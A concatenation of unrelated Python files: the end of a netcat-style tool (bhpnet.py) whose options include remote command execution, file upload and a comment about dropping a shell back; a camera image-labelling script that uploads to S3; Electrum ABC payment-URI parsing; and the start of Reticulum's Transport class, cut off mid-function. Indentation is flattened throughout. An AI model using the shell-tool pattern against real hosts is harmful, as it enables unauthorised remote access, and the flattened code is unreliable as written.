print("echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135")
print("")
sys.exit(0)
def main():
"""
Main function. Parses options passed to the script and determines if the script
will run as a server or a client.
"""
global LISTEN
global PORT
global EXECUTE
global COMMAND_SHELL
global UPLOAD_DEST
global TARGET
# Display the options and usage information if no command line options are passed.
if not len(sys.argv[1:]):
usage()
# Read the command line options
try:
opts, args = getopt.getopt(sys.argv[1:],
"hle:t:p:cu:",
["help", "listen", "execute", "target", "port", "command", "upload"])
except getopt.GetoptError as err:
print(str(err))
usage()
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
LISTEN = True
elif o in ("-e", "--execute"):
EXECUTE = a
elif o in ("-c", "--command"):
COMMAND_SHELL = True
elif o in ("-u", "--upload"):
UPLOAD_DEST = a
elif o in ("-t", "--target"):
TARGET = a
elif o in ("-p", "--port"):
PORT = int(a)
else:
assert False, "Unhandled Option"
# Determine if the script should be ran as a TCP server or client.
if LISTEN:
# we are going to listen and potentially upload things, execute commands, and drop a shell back
# depending on the command line options above
server_loop()
elif len(TARGET) and PORT > 0:
# we are going to be sending data to the server.
# send data off
client_sender()
if __name__ == '__main__':
main()
|
gather.py
|
import os
import sys
import PySpin
from absl import app
from absl import flags
import numpy as np
import cv2
import time
from os import mkdir
from os.path import isdir, exists
import threading
import queue
import logging
import boto3
from botocore.exceptions import ClientError
from dataclasses import dataclass
WINDOW_NAME = "Recyclops"
FONT = cv2.FONT_HERSHEY_SIMPLEX
CATEGORY_DISPLAY_MILLISECONDS = 750
NUM_BUFFERS = 3
INFO_COLOR = (81, 237, 14)
s3_client_upload = None
flags.DEFINE_string(
'image_file_type',
'jpg',
    'File format to save images as',
)
flags.DEFINE_bool(
'send_to_cloud',
True,
'Should captured images be sent to S3?',
)
flags.DEFINE_string(
's3_bucket_name',
'recyclops',
'Name of the s3 bucket to send images to'
)
flags.DEFINE_float(
'display_scale_factor',
0.5,
'Scale factor to apply to displayed images',
)
flags.DEFINE_float(
'save_scale_factor',
0.5,
'Scale factor to apply to saved images',
)
flags.DEFINE_bool(
'mirror_display',
True,
'Mirror the displayed image',
)
@dataclass
class Category:
display_name: str
data_name: str
text_color: tuple
keyboard_string: str
@dataclass
class ImageToSave:
filename: str
category_str: str
image_data: np.ndarray
aluminum_category = Category('Aluminum', 'aluminum', (237, 181, 14), '1')
compost_category = Category('Compost', 'compost', (219, 56, 210), '2')
glass_category = Category('Glass', 'glass', (255, 74, 164), '3')
paper_category = Category('Paper', 'paper', (230, 245, 24), '4')
plastic_category = Category('Plastic', 'plastic', (24, 230, 245), '5')
trash_category = Category('Trash', 'trash', (24, 171, 245), '0')
categories = [aluminum_category, compost_category, glass_category,\
paper_category, plastic_category, trash_category]
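# Illustrative note (added comment, not from the original script): while the
# preview window has focus, pressing a category's keyboard_string tags the
# current frame with that category; e.g. pressing '1' queues the frame to be
# saved (and optionally uploaded) as aluminum/aluminum-<timestamp>.jpg
# (see acquire_images and process_images below).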
def bucket_exists(bucket_name):
"""Determine whether bucket_name exists and the user has permission to access it
:param bucket_name: string
:return: True if the referenced bucket_name exists, otherwise False
"""
s3_client_bucket_check = boto3.client('s3')
try:
response = s3_client_bucket_check.head_bucket(Bucket=bucket_name)
except Exception as e:
logging.debug(e)
return False
return True
class ProgressPercentage(object):
def __init__(self, filename):
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._lock = threading.Lock()
def __call__(self, bytes_amount):
# To simplify, assume this is hooked up to a single filename
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
sys.stdout.write(
"\r%s %s / %s (%.2f%%)" % (
self._filename, self._seen_so_far, self._size,
percentage))
sys.stdout.flush()
def upload_file(file_name, bucket, object_name=None):
    """Upload a file to an S3 bucket
    :param file_name: File to upload
    :param bucket: Bucket to upload to
    :param object_name: S3 object name. If not specified then file_name is used
    :return: True if file was uploaded, else False
    """
    global s3_client_upload
# If S3 object_name was not specified, use file_name
if object_name is None:
object_name = file_name
    if s3_client_upload is None:
s3_client_upload = boto3.client('s3')
try:
s3_client_upload.upload_file(file_name, bucket, object_name,
Callback=ProgressPercentage(file_name))
print('\n')
except ClientError as e:
logging.error(e)
return False
return True
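# Illustrative usage sketch (added comment, not from the original script);
# bucket and file names are placeholders:
#
#     upload_file('aluminum/aluminum-123.jpg', 'recyclops',
#                 'aluminum/aluminum-123.jpg')
#     # -> True on success, False (with a logged ClientError) on failure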
def print_device_info(nodemap):
print('*** DEVICE INFORMATION ***\n')
try:
node_device_information = PySpin.CCategoryPtr(nodemap.GetNode('DeviceInformation'))
if PySpin.IsAvailable(node_device_information) and PySpin.IsReadable(node_device_information):
features = node_device_information.GetFeatures()
for feature in features:
node_feature = PySpin.CValuePtr(feature)
print('%s: %s' % (node_feature.GetName(),
node_feature.ToString() if PySpin.IsReadable(node_feature) else 'Node not readable'))
else:
print('Device control information not available.')
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def configure_trigger(cam):
try:
if cam.TriggerMode.GetAccessMode() != PySpin.RW:
print('Unable to disable trigger mode (node retrieval). Aborting...')
return False
cam.TriggerMode.SetValue(PySpin.TriggerMode_Off)
if cam.TriggerSource.GetAccessMode() != PySpin.RW:
print('Unable to get trigger source (node retrieval). Aborting...')
return False
cam.TriggerSource.SetValue(PySpin.TriggerSource_Software)
cam.TriggerMode.SetValue(PySpin.TriggerMode_On)
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def reset_trigger(cam):
try:
if cam.TriggerMode.GetAccessMode() != PySpin.RW:
print('Unable to disable trigger mode (node retrieval). Aborting...')
return False
cam.TriggerMode.SetValue(PySpin.TriggerMode_Off)
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def configure_trigger_ready_line(cam):
try:
cam.LineSelector.SetValue(PySpin.LineSelector_Line2)
cam.LineMode.SetValue(PySpin.LineMode_Output)
lineSourceNode = PySpin.CEnumerationPtr(cam.GetNodeMap().GetNode("LineSource"))
frameTriggerWaitEntry = lineSourceNode.GetEntryByName("FrameTriggerWait")
lineSourceNode.SetIntValue(frameTriggerWaitEntry.GetValue())
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def triggerReady(cam):
return (cam.LineStatusAll() & (1 << 2)) != 0
def grab_next_image_by_trigger(cam):
try:
# Execute software trigger
if cam.TriggerSoftware.GetAccessMode() != PySpin.WO:
print('Unable to execute trigger. Aborting...')
return False
cam.TriggerSoftware.Execute()
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def process_images(serial_number, image_queue):
    while True:
        image_to_save = image_queue.get(block=True)
        if image_to_save is None:
break
filepath = image_to_save.category_str + '/' + image_to_save.filename
print('Image saved at path: %s'% filepath)
cv2.imwrite(filepath, image_to_save.image_data)
if flags.FLAGS.send_to_cloud:
upload_file(filepath, flags.FLAGS.s3_bucket_name, filepath)
def acquire_images(cam, image_queue):
cv2.namedWindow(WINDOW_NAME)
cv2.moveWindow(WINDOW_NAME, 0, 0)
try:
# Stop Acquisition if image is streaming
if(cam.IsStreaming()):
cam.EndAcquisition()
# Retrieve Stream Parameters device nodemap
s_node_map = cam.GetTLStreamNodeMap()
# Retrieve Buffer Handling Mode Information
handling_mode = PySpin.CEnumerationPtr(s_node_map.GetNode('StreamBufferHandlingMode'))
handling_mode_entry = handling_mode.GetEntryByName('NewestOnly')
handling_mode.SetIntValue(handling_mode_entry.GetValue())
# Set stream buffer Count Mode to manual
stream_buffer_count_mode = PySpin.CEnumerationPtr(s_node_map.GetNode('StreamBufferCountMode'))
stream_buffer_count_mode_manual = PySpin.CEnumEntryPtr(stream_buffer_count_mode.GetEntryByName('Manual'))
stream_buffer_count_mode.SetIntValue(stream_buffer_count_mode_manual.GetValue())
# Retrieve and modify Stream Buffer Count
buffer_count = PySpin.CIntegerPtr(s_node_map.GetNode('StreamBufferCountManual'))
buffer_count.SetValue(NUM_BUFFERS)
# Display Buffer Info
print('Buffer Handling Mode: %s' % handling_mode_entry.GetDisplayName())
print('Buffer Count: %d' % buffer_count.GetValue())
print('Maximum Buffer Count: %d' % buffer_count.GetMax())
buffer_count.SetValue(NUM_BUFFERS)
# Set acquisition mode to continuous
if cam.AcquisitionMode.GetAccessMode() != PySpin.RW:
print('Unable to set acquisition mode to continuous. Aborting...')
return False
cam.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous)
print('Acquisition mode set to continuous...')
# Begin acquiring images
cam.BeginAcquisition()
print('Acquiring images. Press esc to end Acquisition.')
# Get device serial number for filename
device_serial_number = cam.GetUniqueID()
info_string = ''
for category in categories:
info_string += "%s:'%s' " % (category.display_name, category.keyboard_string)
# Retrieve, convert, and save images
        while True:
            try:
                while not triggerReady(cam):
                    time.sleep(0.001)
grab_next_image_by_trigger(cam)
# Retrieve next received image
image_result = cam.GetNextImage()
# Ensure image completion
if image_result.IsIncomplete():
print('Image incomplete with image status %d ...' % image_result.GetImageStatus())
else:
# get a numpy array of the image data
imageArray = image_result.GetNDArray()
if len(imageArray.shape) < 3:
# convert the image from BayerRG8 to RGB8
imageArray = cv2.cvtColor(imageArray, cv2.COLOR_BayerRG2RGB)
displayArray = np.copy(imageArray)
if flags.FLAGS.mirror_display:
displayArray = cv2.flip(displayArray, flipCode = 1)
displayArray = cv2.putText(displayArray,\
info_string, (0,50), FONT, 2,\
INFO_COLOR, 2, cv2.LINE_AA)
if flags.FLAGS.display_scale_factor != 1:
displayArray = cv2.resize(displayArray, (0,0),
fx=flags.FLAGS.display_scale_factor,
fy=flags.FLAGS.display_scale_factor)
cv2.imshow(WINDOW_NAME, displayArray)
keypress = cv2.waitKey(1)
if keypress == 27:
# escape key pressed
break
image_category = None
for category in categories:
if(keypress & 0xFF == ord(category.keyboard_string)):
image_category = category
if(image_category != None):
# Create a unique filename
filename = '%s-%d.%s' % (image_category.data_name,
image_result.GetTimeStamp(), flags.FLAGS.image_file_type)
print('Filename: %s, height :%d, width :%d' %
(filename, imageArray.shape[0], imageArray.shape[1]))
saveArray = np.copy(imageArray)
if flags.FLAGS.save_scale_factor != 1:
saveArray = cv2.resize(imageArray, (0,0),
fx=flags.FLAGS.save_scale_factor,
fy=flags.FLAGS.save_scale_factor)
image_queue.put(ImageToSave(filename, image_category.data_name, saveArray))
displayArray = np.copy(imageArray)
if flags.FLAGS.mirror_display:
displayArray = cv2.flip(displayArray, flipCode=1)
displayArray = cv2.putText(displayArray,\
image_category.display_name , (0,50), FONT, 2,\
image_category.text_color, 2, cv2.LINE_AA)
if flags.FLAGS.display_scale_factor != 1:
displayArray = cv2.resize(displayArray, (0,0),
fx=flags.FLAGS.display_scale_factor,
fy=flags.FLAGS.display_scale_factor)
cv2.imshow(WINDOW_NAME, displayArray)
cv2.waitKey(CATEGORY_DISPLAY_MILLISECONDS)
# Release image
image_result.Release()
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
# End acquisition
cam.EndAcquisition()
cv2.destroyAllWindows()
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def run_single_camera(cam):
try:
# Retrieve TL device nodemap and print device information
nodemap_tldevice = cam.GetTLDeviceNodeMap()
print_device_info(nodemap_tldevice)
# Initialize camera
cam.Init()
# Retrieve GenICam nodemap
nodemap = cam.GetNodeMap()
# Configure trigger
if configure_trigger(cam) is False:
return False
# Configure trigger ready line
if configure_trigger_ready_line(cam) is False:
return False
image_queue = queue.Queue()
grab_thread = threading.Thread(target=acquire_images, args=(cam, image_queue,))
process_thread = threading.Thread(target=process_images, args=(cam.GetUniqueID(), image_queue,))
process_thread.start()
grab_thread.start()
grab_thread.join()
print('Finished Acquiring Images')
image_queue.put(None)
process_thread.join()
print('Finished Processing Images')
# Reset trigger
reset_trigger(cam)
# Deinitialize camera
cam.DeInit()
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def main(unused_argv):
# Retrieve singleton reference to system object
system = PySpin.System.GetInstance()
    # create the output directories
for category in categories:
if(not isdir(category.data_name) or not exists(category.data_name)):
print('Creating output directory: %s' % category.data_name)
try:
mkdir(category.data_name)
except OSError:
print ("Creation of the directory %s failed" % category.data_name)
return
else:
print ("Successfully created the directory %s " % category.data_name)
if flags.FLAGS.send_to_cloud:
# Check if the bucket exists
if bucket_exists(flags.FLAGS.s3_bucket_name):
print('%s exists and you have permission to access it.' % flags.FLAGS.s3_bucket_name)
else:
print('%s does not exist or you do not have permission to access it.' % flags.FLAGS.s3_bucket_name)
return
# Retrieve list of cameras from the system
cam_list = system.GetCameras()
num_cameras = cam_list.GetSize()
print('Number of cameras detected: %d' % num_cameras)
# Finish if there are no cameras
if num_cameras == 0:
# Clear camera list before releasing system
cam_list.Clear()
# Release system instance
system.ReleaseInstance()
print('Not enough cameras!')
input('Done! Press Enter to exit...')
return False
cam = cam_list.GetByIndex(0)
print('Running example for camera...')
run_single_camera(cam)
print('Camera example complete... \n')
# Release reference to camera
# NOTE: Unlike the C++ examples, we cannot rely on pointer objects being automatically
# cleaned up when going out of scope.
# The usage of del is preferred to assigning the variable to None.
del cam
# Clear camera list before releasing system
cam_list.Clear()
# Release system instance
system.ReleaseInstance()
print('Exiting...\n')
if __name__ == "__main__":
app.run(main)
|
web.py
|
# Electrum ABC - lightweight eCash client
# Copyright (C) 2020 The Electrum ABC developers
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import decimal
import enum
import os
import re
import shutil
import sys
import threading
from typing import Dict, Union
import urllib
from .address import Address
from . import bitcoin
from .constants import WHITELISTED_PREFIXES
from . import networks
from .util import format_satoshis_plain, bh2u, bfh, print_error, do_in_main_thread
from . import cashacct
from .i18n import _
class ExplorerUrlParts(enum.Enum):
TX = enum.auto()
ADDR = enum.auto()
BLOCK = enum.auto()
class BlockchainExplorer:
name: str = ""
url_base: str = ""
addr_fmt: str = Address.FMT_CASHADDR
tx_part: str = "tx"
addr_part: str = "address"
block_part: str = "block"
addr_uses_prefix: bool = True
def get_kind_str(self, kind: ExplorerUrlParts) -> str:
if kind == ExplorerUrlParts.TX:
return self.tx_part
if kind == ExplorerUrlParts.ADDR:
return self.addr_part
if kind == ExplorerUrlParts.BLOCK:
return self.block_part
raise RuntimeError(f"Unknown block explorer URL kind {kind} ({type(kind)}")
class Blockchair(BlockchainExplorer):
name = "Blockchair"
url_base = "https://blockchair.com/ecash"
addr_fmt = Address.FMT_CASHADDR_BCH
tx_part = "transaction"
addr_uses_prefix = False
class ViaWallet(BlockchainExplorer):
name = "ViaWallet"
url_base = "https://explorer.viawallet.com/xec"
addr_uses_prefix: bool = False
class BitcoinABC(BlockchainExplorer):
name = "BitcoinABC"
url_base = "https://explorer.bitcoinabc.org"
block_part = "block-height"
class BitcoinABCTestnet(BitcoinABC):
url_base = "https://texplorer.bitcoinabc.org"
class BeCash(BlockchainExplorer):
name = "be.cash"
url_base = "https://explorer.be.cash"
DEFAULT_EXPLORER = BitcoinABC
mainnet_block_explorers = {explorer.name: explorer for explorer in
[Blockchair, ViaWallet, BitcoinABC, BeCash]}
DEFAULT_EXPLORER_TESTNET = BitcoinABCTestnet
testnet_block_explorers = {BitcoinABCTestnet.name: BitcoinABCTestnet}
def BE_info() -> Dict[str, BlockchainExplorer]:
if networks.net is networks.TestNet:
return testnet_block_explorers
return mainnet_block_explorers
def BE_default_explorer() -> BlockchainExplorer:
if networks.net is networks.TestNet:
return DEFAULT_EXPLORER_TESTNET
return DEFAULT_EXPLORER
def BE_name_from_config(config) -> str:
return config.get('block_explorer', BE_default_explorer().name)
def BE_URL(config, kind: ExplorerUrlParts, item: Union[str, Address]) -> str:
explorer_name = BE_name_from_config(config)
explorer = BE_info().get(explorer_name, BE_default_explorer())
kind_str = BlockchainExplorer.get_kind_str(explorer, kind)
if kind == ExplorerUrlParts.ADDR:
assert isinstance(item, Address)
if explorer.addr_uses_prefix:
item = item.to_full_string(explorer.addr_fmt)
else:
item = item.to_string(explorer.addr_fmt)
return "/".join(part for part in (explorer.url_base, kind_str, item) if part)
def BE_sorted_list():
return sorted(BE_info())
def _strip_cashacct_str(s: str) -> str:
'''Strips emojis and ';' characters from a cashacct string
of the form name#number[.123]'''
return cashacct.CashAcct.strip_emoji(s).replace(';', '').strip()
def create_URI(addr, amount, message, *, op_return=None, op_return_raw=None, net=None):
is_cashacct = bool(isinstance(addr, str) and cashacct.CashAcct.parse_string(addr))
if not isinstance(addr, Address) and not is_cashacct:
return ""
if op_return is not None and op_return_raw is not None:
        raise ValueError('Must specify exactly one of op_return or op_return_raw as kwargs to create_URI')
if is_cashacct:
scheme, path = cashacct.URI_SCHEME, _strip_cashacct_str(addr)
else:
scheme, path = addr.to_URI_components(net=net)
query = []
if amount:
query.append(f'amount={format_satoshis_plain(amount, 2)}')
if message:
query.append('message=%s'%urllib.parse.quote(message))
if op_return:
query.append(f'op_return={str(op_return)}')
if op_return_raw:
query.append(f'op_return_raw={str(op_return_raw)}')
p = urllib.parse.ParseResult(scheme=scheme,
netloc='', path=path, params='',
query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
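# Illustrative note (added comment, not from the original module): the result
# has the form "<scheme>:<path>?amount=...&message=...", e.g. an Address plus
# an amount yields something like "ecash:qq...?amount=5.46&message=donation"
# (the exact amount string comes from format_satoshis_plain).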
def urlencode(s):
''' URL Encode; encodes a url or a uri fragment by %-quoting special chars'''
return urllib.parse.quote(s)
def urldecode(url):
''' Inverse of urlencode '''
return urllib.parse.unquote(url)
def parseable_schemes(net = None) -> tuple:
if net is None:
net = networks.net
return tuple(WHITELISTED_PREFIXES) + (cashacct.URI_SCHEME, )
class ExtraParametersInURIWarning(RuntimeWarning):
''' Raised by parse_URI to indicate the parsing succeeded but that
extra parameters were encountered when parsing.
args[0] is the function return value (dict of parsed args).
args[1:] are the URL parameters that were not understood (unknown params)'''
class DuplicateKeyInURIError(RuntimeError):
''' Raised on duplicate param keys in URI.
args[0] is a translated error message suitable for the UI
args[1:] is the list of duplicate keys. '''
class BadSchemeError(RuntimeError):
''' Raised if the scheme is bad/unknown for a URI. '''
class BadURIParameter(ValueError):
''' Raised if:
- 'amount' is not numeric,
- 'address' is invalid
- bad cashacct string,
- 'time' or 'exp' are not ints
args[0] is the bad argument name e.g. 'amount'
args[1] is the underlying Exception that was raised (if any, may be missing). '''
def parse_URI(uri, on_pr=None, *, net=None, strict=False, on_exc=None):
""" If strict=True, may raise ExtraParametersInURIWarning (see docstring
above).
on_pr - a callable that will run in the context of a daemon thread if this
is a payment request which requires further network processing. A single
argument is passed to the callable, the payment request after being verified
on the network. Note: as stated, this runs in the context of the daemon
thread, unlike on_exc below.
on_exc - (optional) a callable that will be executed in the *main thread*
only in the cases of payment requests and only if they fail to serialize or
deserialize. The callable must take 1 arg, a sys.exc_info() tuple. Note: as
    stated, this runs in the context of the main thread always, unlike on_pr
above.
May raise DuplicateKeyInURIError if duplicate keys were found.
May raise BadSchemeError if unknown scheme.
May raise Exception subclass on other misc. failure.
Returns a dict of uri_param -> value on success """
if net is None:
net = networks.net
if ':' not in uri:
# Test it's valid
Address.from_string(uri, net=net)
return {'address': uri}
u = urllib.parse.urlparse(uri, allow_fragments=False) # allow_fragments=False allows for cashacct:name#number URIs
# The scheme always comes back in lower case
accept_schemes = parseable_schemes(net=net)
if u.scheme not in accept_schemes:
raise BadSchemeError(_("Not a {schemes} URI").format(schemes=str(accept_schemes)))
address = u.path
is_cashacct = u.scheme == cashacct.URI_SCHEME
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query, keep_blank_values=True)
else:
pq = urllib.parse.parse_qs(u.query, keep_blank_values=True)
for k, v in pq.items():
if len(v) != 1:
raise DuplicateKeyInURIError(_('Duplicate key in URI'), k)
out = {k: v[0] for k, v in pq.items()}
if address:
if is_cashacct:
if '%' in address:
# on macOS and perhaps other platforms the '#' character may
# get passed-in as a '%23' if opened from a link or from
# some other source. The below call is safe and won't raise.
address = urldecode(address)
if not cashacct.CashAcct.parse_string(address):
raise BadURIParameter('address', ValueError(_("{acct_name} is not a valid cashacct string").format(acct_name=address)))
address = _strip_cashacct_str(address)
else:
# validate
try: Address.from_string(address, net=net)
except Exception as e: raise BadURIParameter('address', e) from e
out['address'] = address
if 'amount' in out:
try:
am = out['amount']
m = re.match(r'([0-9.]+)X([0-9]{2})', am)
if m:
k = int(m.group(2)) - 2
amount = decimal.Decimal(m.group(1)) * int(pow(10, k))
else:
amount = decimal.Decimal(am) * int(bitcoin.CASH)
out['amount'] = int(amount)
except (ValueError, decimal.InvalidOperation, TypeError) as e:
raise BadURIParameter('amount', e) from e
if strict and 'memo' in out and 'message' in out:
# these two args are equivalent and cannot both appear together
raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'memo', 'message')
elif 'message' in out:
out['memo'] = out['message']
elif 'memo' in out:
out['message'] = out['memo']
if 'time' in out:
try: out['time'] = int(out['time'])
except ValueError as e: raise BadURIParameter('time', e) from e
if 'exp' in out:
try: out['exp'] = int(out['exp'])
except ValueError as e: raise BadURIParameter('exp', e) from e
if 'sig' in out:
try: out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
except Exception as e: raise BadURIParameter('sig', e) from e
if 'op_return_raw' in out and 'op_return' in out:
if strict:
# these two args cannot both appear together
raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'op_return', 'op_return_raw')
del out['op_return_raw'] # if not strict, just pick 1 and delete the other
if 'op_return_raw' in out:
# validate op_return_raw arg
try: bfh(out['op_return_raw'])
except Exception as e: raise BadURIParameter('op_return_raw', e) from e
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
is_pr = bool(r or (name and sig))
if is_pr and is_cashacct:
raise ValueError(_("'{uri_scheme}' payment requests are not currently supported").format(uri_scheme=cashacct.URI_SCHEME))
if on_pr and is_pr:
def get_payment_request_thread():
from . import paymentrequest as pr
try:
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
except:
''' May happen if the values in the request are such
that they cannot be serialized to a protobuf. '''
einfo = sys.exc_info()
print_error("Error processing payment request:", str(einfo[1]))
if on_exc:
do_in_main_thread(on_exc, einfo)
return
if on_pr:
# FIXME: See about also making this use do_in_main_thread.
# However existing code for Android and/or iOS may not be
# expecting this, so we will leave the original code here where
# it runs in the daemon thread context. :/
on_pr(request)
t = threading.Thread(target=get_payment_request_thread, daemon=True)
t.start()
if strict:
accept_keys = {'r', 'sig', 'name', 'address', 'amount', 'label', 'message', 'memo', 'op_return', 'op_return_raw', 'time', 'exp'}
extra_keys = set(out.keys()) - accept_keys
if extra_keys:
raise ExtraParametersInURIWarning(out, *tuple(extra_keys))
return out
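# Illustrative example (added comment, not from the original module); the
# address part is a placeholder, and it is assumed that 'ecash' is among the
# whitelisted schemes and that bitcoin.CASH == 100:
#
#     parse_URI("ecash:qq...?amount=1.23&message=coffee")
#     # -> {'address': 'qq...', 'amount': 123,
#     #     'message': 'coffee', 'memo': 'coffee'}
#
# i.e. the amount comes back as an integer number of base units.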
def check_www_dir(rdir):
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
Transport.py
|
import os
import RNS
import time
import math
import struct
import threading
import traceback
from time import sleep
from .vendor import umsgpack as umsgpack
class Transport:
"""
Through static methods of this class you can interact with the
Transport system of Reticulum.
"""
# Constants
    BROADCAST = 0x00
    TRANSPORT = 0x01
    RELAY = 0x02
    TUNNEL = 0x03
types = [BROADCAST, TRANSPORT, RELAY, TUNNEL]
REACHABILITY_UNREACHABLE = 0x00
REACHABILITY_DIRECT = 0x01
REACHABILITY_TRANSPORT = 0x02
APP_NAME = "rnstransport"
PATHFINDER_M = 128 # Max hops
"""
Maximum amount of hops that Reticulum will transport a packet.
"""
PATHFINDER_C = 2.0 # Decay constant
PATHFINDER_R = 1 # Retransmit retries
PATHFINDER_T = 10 # Retry grace period
PATHFINDER_RW = 10 # Random window for announce rebroadcast
PATHFINDER_E = 60*60*24*7 # Path expiration in seconds
# TODO: Calculate an optimal number for this in
# various situations
LOCAL_REBROADCASTS_MAX = 2 # How many local rebroadcasts of an announce is allowed
PATH_REQUEST_GRACE = 0.35 # Grace time before a path announcement is made, allows directly reachable peers to respond first
PATH_REQUEST_RW = 2 # Path request random window
LINK_TIMEOUT = RNS.Link.KEEPALIVE * 2
REVERSE_TIMEOUT = 30*60 # Reverse table entries are removed after max 30 minutes
DESTINATION_TIMEOUT = PATHFINDER_E # Destination table entries are removed if unused for one week
MAX_RECEIPTS = 1024 # Maximum number of receipts to keep track of
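    # Illustrative note (added comment, not from the original source): an
    # announce waiting in the announce table is retransmitted roughly
    #     PATHFINDER_C ** hops + PATHFINDER_T + PATHFINDER_RW
    # seconds after the previous attempt (see the announce processing in
    # jobs() below), and is dropped once it has been retried more than
    # PATHFINDER_R times.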
interfaces = [] # All active interfaces
destinations = [] # All active destinations
pending_links = [] # Links that are being established
active_links = [] # Links that are active
packet_hashlist = [] # A list of packet hashes for duplicate detection
receipts = [] # Receipts of all outgoing packets for proof processing
# TODO: "destination_table" should really be renamed to "path_table"
# Notes on memory usage: 1 megabyte of memory can store approximately
    # 55,100 path table entries or approximately 22,300 link table entries.
announce_table = {} # A table for storing announces currently waiting to be retransmitted
destination_table = {} # A lookup table containing the next hop to a given destination
reverse_table = {} # A lookup table for storing packet hashes used to return proofs and replies
link_table = {} # A lookup table containing hops for links
held_announces = {} # A table containing temporarily held announce-table entries
announce_handlers = [] # A table storing externally registered announce handlers
tunnels = {} # A table storing tunnels to other transport instances
# Transport control destinations are used
# for control purposes like path requests
control_destinations = []
control_hashes = []
# Interfaces for communicating with
# local clients connected to a shared
# Reticulum instance
local_client_interfaces = []
local_client_rssi_cache = []
local_client_snr_cache = []
LOCAL_CLIENT_CACHE_MAXSIZE = 512
jobs_locked = False
jobs_running = False
job_interval = 0.250
receipts_last_checked = 0.0
receipts_check_interval = 1.0
announces_last_checked = 0.0
announces_check_interval = 1.0
hashlist_maxsize = 1000000
tables_last_culled = 0.0
tables_cull_interval = 5.0
identity = None
@staticmethod
def start(reticulum_instance):
Transport.owner = reticulum_instance
if Transport.identity == None:
transport_identity_path = RNS.Reticulum.storagepath+"/transport_identity"
if os.path.isfile(transport_identity_path):
Transport.identity = RNS.Identity.from_file(transport_identity_path)
if Transport.identity == None:
RNS.log("No valid Transport Identity in storage, creating...", RNS.LOG_VERBOSE)
Transport.identity = RNS.Identity()
Transport.identity.to_file(transport_identity_path)
else:
RNS.log("Loaded Transport Identity from storage", RNS.LOG_VERBOSE)
packet_hashlist_path = RNS.Reticulum.storagepath+"/packet_hashlist"
if os.path.isfile(packet_hashlist_path):
try:
file = open(packet_hashlist_path, "rb")
Transport.packet_hashlist = umsgpack.unpackb(file.read())
file.close()
except Exception as e:
RNS.log("Could not load packet hashlist from storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
# Create transport-specific destinations
Transport.path_request_destination = RNS.Destination(None, RNS.Destination.IN, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
Transport.path_request_destination.set_packet_callback(Transport.path_request_handler)
Transport.control_destinations.append(Transport.path_request_destination)
Transport.control_hashes.append(Transport.path_request_destination.hash)
Transport.tunnel_synthesize_destination = RNS.Destination(None, RNS.Destination.IN, RNS.Destination.PLAIN, Transport.APP_NAME, "tunnel", "synthesize")
Transport.tunnel_synthesize_destination.set_packet_callback(Transport.tunnel_synthesize_handler)
        Transport.control_destinations.append(Transport.tunnel_synthesize_destination)
Transport.control_hashes.append(Transport.tunnel_synthesize_destination.hash)
thread = threading.Thread(target=Transport.jobloop)
        thread.daemon = True
thread.start()
if RNS.Reticulum.transport_enabled():
destination_table_path = RNS.Reticulum.storagepath+"/destination_table"
tunnel_table_path = RNS.Reticulum.storagepath+"/tunnels"
if os.path.isfile(destination_table_path) and not Transport.owner.is_connected_to_shared_instance:
serialised_destinations = []
try:
file = open(destination_table_path, "rb")
serialised_destinations = umsgpack.unpackb(file.read())
file.close()
for serialised_entry in serialised_destinations:
